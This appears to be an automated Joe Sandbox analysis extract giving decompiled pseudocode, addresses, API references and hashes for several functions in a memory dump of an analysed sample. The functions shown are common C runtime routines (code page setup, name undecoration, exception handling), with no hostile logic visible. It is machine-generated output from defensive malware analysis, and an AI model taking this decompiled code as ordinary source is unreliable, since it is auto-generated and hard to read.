0x00000000
0x00000000

APIs

__aulldvrm.LIBCMT ref: 004145C6

Strings

+, xrefs: 00414501
-, xrefs: 004144F4

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 199196e76f69c53d5978391b73a5044f0b1bb26a5105d0d93d21fffbf3a361df
Instruction ID: 1860c04d4f79d0a4cc6270a9722627b98ba71dee3c4c2f31591441b4ce1be784
Opcode Fuzzy Hash: 199196e76f69c53d5978391b73a5044f0b1bb26a5105d0d93d21fffbf3a361df
Instruction Fuzzy Hash: B3910B70904149AFDF14CF69C4506FEBBB1EF96328F14825BE875A7391D33C89828B59

Uniqueness

Uniqueness Score: -1.00%

Function 004326F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004326F0(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0x454264; // 0x8c4320d5
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E004321FD(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E00432294(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x454890)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x456d2c - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											E004097A0(_t92, _t95 + 0x18, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t76 = _t95 + 0x1a;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *((intOrPtr*)(_t95 + 0x21c)) = E004321B9( *(_t95 + 4));
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t92 = _t95 + 0xc;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E004322F9(_t90, _t95);
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					E004097A0(_t92, _t95 + 0x18, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x4548a0;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x454888; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E004321B9(_t78);
					_t85 = _t95 + 0xc;
					_t90 = _v36 + 0x454894;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t85 = _t85 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E004085C2(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}

0x004326f0
0x004326f8
0x004326ff
0x00432704
0x00432710
0x00432715
0x004328cb
0x004328cc
0x00000000
0x0043271b
0x0043271b
0x0043271d
0x0043271f
0x00432721
0x00432724
0x00432730
0x00432731
0x00432734
0x0043273c
0x00000000
0x0043273e
0x00432744
0x0043281b
0x0043281b
0x0043274a
0x0043274e
0x00432756
0x00000000
0x0043275c
0x00432763
0x00432790
0x00432796
0x00432798
0x0043280f
0x00432815
0x00000000
0x00000000
0x00000000
0x00000000
0x0043279a
0x004327a4
0x004327ac
0x004327af
0x004327b3
0x004327b9
0x004327bb
0x004327bf
0x004327c2
0x004327c4
0x004327c4
0x004327c7
0x004327c9
0x00000000
0x00000000
0x004327cb
0x004327ce
0x004327d9
0x004327d9
0x004327db
0x00000000
0x00000000
0x004327d3
0x004327d8
0x004327d8
0x004327d8
0x004327dd
0x004327e0
0x004327e3
0x00000000
0x00000000
0x00000000
0x004327e3
0x004327c4
0x004327e5
0x004327e5
0x004327e8
0x004327ed
0x004327ed
0x004327f0
0x004327f1
0x004327f1
0x004327f1
0x00432800
0x00432809
0x00432809
0x00000000
0x004327b9
0x00432765
0x00432765
0x00432768
0x0043276e
0x00432771
0x00432775
0x00432775
0x0043277a
0x0043277d
0x0043277e
0x0043277f
0x00432780
0x00432781
0x004328d1
0x004328d1
0x004328d3
0x00432763
0x00432756
0x00432744
0x00000000
0x0043273c
0x0043282d
0x00432835
0x00432835
0x00432839
0x0043283c
0x00432842
0x00432845
0x00432845
0x00432848
0x0043284a
0x0043284c
0x0043284c
0x0043284f
0x00432851
0x00000000
0x00000000
0x00432853
0x00432856
0x00432872
0x00432872
0x00432874
0x00000000
0x00000000
0x0043285b
0x00432861
0x00432863
0x00432869
0x0043286d
0x0043286d
0x0043286e
0x00000000
0x0043286e
0x00000000
0x00432861
0x00432876
0x00432879
0x0043287c
0x00000000
0x00000000
0x00000000
0x0043287c
0x0043287e
0x0043287e
0x00432881
0x00432882
0x00432885
0x00432888
0x00432888
0x0043288e
0x00432891
0x004328a0
0x004328a9
0x004328ae
0x004328b4
0x004328b5
0x004328b5
0x004328b8
0x004328bb
0x004328be
0x004328c1
0x004328c1
0x004328c1
0x00000000
0x004328c6
0x004328d4
0x004328e2

APIs

Part of subcall function 004321FD: GetOEMCP.KERNEL32(00000000,00432495,?,?,(mE`wB,00456D28,00427760), ref: 00432228

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,(mE`wB,004324DC,?,00000000,?,?,?,?,?,?,00456D28), ref: 0043274E
GetCPInfo.KERNEL32(00000000,004324DC,?,(mE`wB,004324DC,?,00000000,?,?,?,?,?,?,00456D28,00427760), ref: 00432790

Strings

(mE`wB, xrefs: 004326F2

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: (mE`wB
API String ID: 546120528-657340838
Opcode ID: 4be5b03721d8fd88a574d74e0eb8aa85f05c6865b0940dc6a13f53efce5cab97
Instruction ID: d595fe2573ff025f6de37b8819f02bc3ee1ba06b82dac46f7f2fad8847b54294
Opcode Fuzzy Hash: 4be5b03721d8fd88a574d74e0eb8aa85f05c6865b0940dc6a13f53efce5cab97
Instruction Fuzzy Hash: 6E5156309003459EDB249F36CA406BBBBF4FF59304F14516FD09287292D7BC9946CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD7D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040FD7D(intOrPtr* _a4) {
				char _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char* _v32;
				char _v40;
				char _v48;
				char _v56;
				void* __edi;
				void* __esi;
				intOrPtr* _t43;
				intOrPtr* _t44;
				char* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				intOrPtr* _t59;
				void* _t62;
				intOrPtr _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				intOrPtr* _t69;
				char _t70;
				intOrPtr _t71;
				char _t72;
				intOrPtr _t74;
				char* _t82;
				signed int* _t83;
				intOrPtr _t84;
				char _t85;
				intOrPtr _t86;
				signed int* _t87;

				_t72 = 0;
				_v6 = 1;
				_v16 = 0;
				_t70 = 0;
				_v12 = 0;
				 *0x456025 = 1;
				while(1) {
					_t43 =  *0x456018; // 0x0
					_t84 =  *_t43;
					if(_t84 == 0 || _t84 == 0x40) {
						break;
					}
					_t46 = _t84 + 0xffffffd0;
					_v24 = _t72;
					_v20 = _t72;
					_v5 = _t72;
					if(_t84 + 0xffffffd0 > 9) {
						_t86 =  *0x456018; // 0x0
						_t74 = _t86;
						if(_t84 != 0x24 ||  *((intOrPtr*)(_t86 + 1)) != _t84) {
							L12:
							_t47 =  *0x456018; // 0x0
							if( *_t47 != 0x24) {
								L21:
								_t49 = E00410465(_t84, _t85, _t86,  &_v56);
								L22:
								_t71 =  *((intOrPtr*)(_t49 + 4));
								_t85 =  *_t49;
								_t50 =  *0x456018; // 0x0
								_v20 = _t71;
								_v24 = _t85;
								if(_t50 - _t86 <= 1) {
									goto L27;
								}
								_t87 =  *0x456014; // 0x0
								if( *_t87 == 9) {
									goto L27;
								}
								if(_t85 == 0) {
									goto L32;
								}
								_t59 = E0040E436(0x456034, 8);
								if(_t59 != 0) {
									 *_t59 = _t85;
									 *((intOrPtr*)(_t59 + 4)) = _t71;
									 *_t87 =  *_t87 + 1;
									 *((intOrPtr*)(_t87 + 4 +  *_t87 * 4)) = _t59;
								}
								goto L27;
							}
							_t82 = _t74 + 1;
							if( *_t82 == 0x24) {
								goto L21;
							}
							 *0x456018 = _t82;
							_t49 = E0041008D( &_v48);
							goto L22;
						} else {
							_t62 =  *((char*)(_t86 + 2)) - 0x24;
							if(_t62 == 0) {
								if( *((char*)(_t86 + 3)) != 0x56) {
									goto L12;
								}
								_t18 = _t86 + 4; // 0x4
								_t63 = _t18;
								L20:
								 *0x456018 = _t63;
								goto L34;
							}
							_t64 = _t62 - 0x31;
							if(_t64 == 0) {
								L16:
								_t15 = _t86 + 3; // 0x3
								_t74 = _t15;
								 *0x456018 = _t74;
								goto L12;
							}
							_t65 = _t64 - 1;
							if(_t65 == 0) {
								L17:
								_t16 = _t86 + 3; // 0x3
								_t63 = _t16;
								goto L20;
							}
							_t66 = _t65 - 1;
							if(_t66 == 0) {
								_v5 = 1;
								goto L16;
							}
							if(_t66 == 3) {
								goto L17;
							}
							goto L12;
						}
					} else {
						_t83 =  *0x456014; // 0x0
						 *0x456018 =  *0x456018 + 1;
						_t69 = E0040ADF4(_t83,  &_v40, _t46);
						_t85 =  *_t69;
						_t71 =  *((intOrPtr*)(_t69 + 4));
						_v24 = _t85;
						_v20 = _t71;
						L27:
						if(_t85 == 0) {
							L32:
							if(_t71 > 1) {
								E0040AAF4(_a4, 2);
								return _a4;
							}
							L33:
							_t70 = _v12;
							L34:
							_t72 = 0;
							_v6 = 0;
							if(_t70 == 0) {
								continue;
							}
							break;
						}
						if(_v6 == 0) {
							E0040B019( &_v16, 0x2c);
						}
						E0040AFC2( &_v16,  &_v24);
						if(_v5 != 0) {
							_v32 = "...";
							_v28 = 3;
							E0040AF6A( &_v16,  &_v32);
						}
						goto L33;
					}
				}
				_t44 = _a4;
				 *0x456025 = _t72;
				 *_t44 = _v16;
				 *((intOrPtr*)(_t44 + 4)) = _t70;
				return _t44;
			}

0x0040fd84
0x0040fd86
0x0040fd8c
0x0040fd8f
0x0040fd91
0x0040fd94
0x0040fd9b
0x0040fd9b
0x0040fda0
0x0040fda4
0x00000000
0x00000000
0x0040fdb6
0x0040fdb9
0x0040fdbc
0x0040fdbf
0x0040fdc5
0x0040fded
0x0040fdf3
0x0040fdf8
0x0040fe1c
0x0040fe1c
0x0040fe24
0x0040fe64
0x0040fe68
0x0040fe6d
0x0040fe6d
0x0040fe70
0x0040fe72
0x0040fe79
0x0040fe7c
0x0040fe83
0x00000000
0x00000000
0x0040fe85
0x0040fe8e
0x00000000
0x00000000
0x0040fe92
0x00000000
0x00000000
0x0040fe9b
0x0040fea2
0x0040fea4
0x0040fea6
0x0040fea9
0x0040fead
0x0040fead
0x00000000
0x0040fea2
0x0040fe26
0x0040fe2a
0x00000000
0x00000000
0x0040fe2f
0x0040fe36
0x00000000
0x0040fdff
0x0040fe03
0x0040fe06
0x0040fe55
0x00000000
0x00000000
0x0040fe57
0x0040fe57
0x0040fe5a
0x0040fe5a
0x00000000
0x0040fe5a
0x0040fe08
0x0040fe0b
0x0040fe41
0x0040fe41
0x0040fe41
0x0040fe44
0x00000000
0x0040fe44
0x0040fe0d
0x0040fe10
0x0040fe4c
0x0040fe4c
0x0040fe4c
0x00000000
0x0040fe4c
0x0040fe12
0x0040fe15
0x0040fe3d
0x00000000
0x0040fe3d
0x0040fe1a
0x00000000
0x00000000
0x00000000
0x0040fe1a
0x0040fdc7
0x0040fdc7
0x0040fdcd
0x0040fdd8
0x0040fddd
0x0040fddf
0x0040fde2
0x0040fde5
0x0040feb1
0x0040feb3
0x0040fef3
0x0040fef6
0x0040ff23
0x00000000
0x0040ff28
0x0040fef8
0x0040fef8
0x0040fefb
0x0040fefb
0x0040fefd
0x0040ff02
0x00000000
0x00000000
0x00000000
0x0040ff02
0x0040feb9
0x0040fec0
0x0040fec0
0x0040fecc
0x0040fed5
0x0040feda
0x0040fee5
0x0040feec
0x0040feec
0x00000000
0x0040fed5
0x0040fdc5
0x0040ff08
0x0040ff0b
0x0040ff14
0x0040ff16
0x00000000

APIs

Replicator::operator[].LIBCMT ref: 0040FDD8
DName::DName.LIBVCRUNTIME ref: 0040FF23

Strings

4`E, xrefs: 0040FE96

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: NameName::Replicator::operator[]
String ID: 4`E
API String ID: 3707554701-3211283174
Opcode ID: a97fbfe4ba596916845ad2ee8425ae639623282ff1cac4f2f6f515d261990fcd
Instruction ID: 561160a4ca35c4b2f8b4a3d8c47240ba48820359d9b508f9e2471c488b5fe967
Opcode Fuzzy Hash: a97fbfe4ba596916845ad2ee8425ae639623282ff1cac4f2f6f515d261990fcd
Instruction Fuzzy Hash: 0751DC719043459ECB35CF68D8846AEBBB4AB09700F54807FD545B7BE2C378AA4CCB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412564 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E00412564(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E0040A321(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E0040A321(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00411BEE(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00411B21(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E0041213F(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E0042B9D6(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x00412564
0x00412564
0x0041256b
0x00412574
0x00412693
0x0041257a
0x0041257a
0x0041257b
0x0041257c
0x00412586
0x00412589
0x0041258f
0x00412599
0x004125be
0x004125c3
0x004125c8
0x0041268f
0x00000000
0x00412690
0x004125c8
0x00412599
0x004125ce
0x004125d1
0x004125d4
0x004125da
0x004125e0
0x004125f2
0x004125f7
0x004125fa
0x004125fd
0x00412600
0x00412603
0x00412609
0x0041260f
0x00412612
0x00412615
0x00412624
0x00412625
0x00412625
0x0041262a
0x0041263d
0x0041263f
0x00412644
0x0041264f
0x00412651
0x00412653
0x0041266f
0x00412674
0x00412677
0x00412677
0x0041264f
0x00412644
0x0041267d
0x0041267e
0x00412681
0x00412684
0x00412687
0x0041268a
0x00412615
0x00000000
0x00412609
0x00412694
0x00412699
0x0041269d
0x004126a0
0x004126a1
0x004126a2
0x004126a3
0x004126a8
0x00412720
0x00412722
0x004126aa
0x004126aa
0x004126b0
0x00000000
0x004126b2
0x004126b5
0x004126b8
0x004126bf
0x004126c2
0x004126c6
0x004126f8
0x004126fb
0x00412702
0x00412708
0x00412712
0x0041271b
0x0041271b
0x00412712
0x00412708
0x0041271c
0x004126c8
0x004126c8
0x004126c8
0x004126cb
0x004126cb
0x004126cf
0x00000000
0x00000000
0x004126d3
0x004126e7
0x004126e7
0x004126d5
0x004126d5
0x004126db
0x00000000
0x004126dd
0x004126dd
0x004126e0
0x004126e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004126e5
0x004126db
0x004126f0
0x004126f2
0x00000000
0x004126f4
0x004126f4
0x004126f4
0x00000000
0x004126f2
0x004126eb
0x004126ed
0x00000000
0x004126ed
0x00000000
0x00000000
0x00000000
0x004126b8
0x004126b0
0x00412723
0x00412727
0x00412727

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00412589

Strings

MOC, xrefs: 0041259B
RCC, xrefs: 004125A3

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: b283d6398a28e0669b2ad2dce4c48f0d0668cc3c283aabe3f9cd8ee5a05e6906
Instruction ID: e91c95a8e1a47d24aa22ff7f072537edeb29005cd5f0c105e99efdc0f080f77b
Opcode Fuzzy Hash: b283d6398a28e0669b2ad2dce4c48f0d0668cc3c283aabe3f9cd8ee5a05e6906
Instruction Fuzzy Hash: E8415B71900209AFCF15DF94DE81AEEBBB6FF48304F14415AFA04B7261D37999A0DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E0040DE94(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t21;
				char* _t24;
				intOrPtr* _t25;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				intOrPtr* _t43;

				_t42 = __edx;
				_t34 =  *0x456018; // 0x0
				_t21 =  *_t34;
				if(_t21 != 0) {
					if(_t21 < 0x30 || _t21 > 0x39) {
						E00410B10(_t42,  &_v20);
						_t24 =  *0x456018; // 0x0
						_pop(_t35);
						if(_v12 == 0) {
							L12:
							if( *_t24 != 0) {
								_t36 = 0;
								_v8 = 2;
								_v12 = 0;
								_t43 =  &_v12;
							} else {
								_t43 = E0040AAF4( &_v12, 1);
								_t36 =  *_t43;
							}
							_t25 = _a4;
							 *_t25 = _t36;
							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t43 + 4));
							return _t25;
						} else {
							_t24 = _t24 + 1;
							 *0x456018 = _t24;
							if(_a8 != 0x42) {
								if(_a8 != 0x41) {
									goto L12;
								} else {
									_push(_v16);
									E0040A8F7(_t35, _a4, _v20);
									goto L9;
								}
							} else {
								_push(_v16);
								E0040A957(_t35, _a4, _v20);
								L9:
								goto L2;
							}
						}
					} else {
						 *0x456018 = _t34 + 1;
						asm("cdq");
						E0040ABD1(_a4, __edx, _t21 - 0x2f, __edx);
						goto L2;
					}
				} else {
					E0040AAF4(_a4, 1);
					L2:
					return _a4;
				}
			}

0x0040de94
0x0040de97
0x0040dea0
0x0040dea4
0x0040deb7
0x0040dedb
0x0040dee4
0x0040dee9
0x0040deea
0x0040df21
0x0040df24
0x0040df36
0x0040df38
0x0040df3f
0x0040df42
0x0040df26
0x0040df30
0x0040df32
0x0040df32
0x0040df45
0x0040df48
0x0040df4d
0x0040df51
0x0040deec
0x0040deec
0x0040def1
0x0040def6
0x0040df0f
0x00000000
0x0040df11
0x0040df11
0x0040df1a
0x00000000
0x0040df1a
0x0040def8
0x0040def8
0x0040df01
0x0040df06
0x00000000
0x0040df06
0x0040def6
0x0040debd
0x0040dec4
0x0040decd
0x0040ded0
0x00000000
0x0040ded0
0x0040dea6
0x0040deab
0x0040deb0
0x0040deb4
0x0040deb4

APIs

DName::DName.LIBVCRUNTIME ref: 0040DEAB
DName::DName.LIBVCRUNTIME ref: 0040DF2B

Strings

A, xrefs: 0040DF0B

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
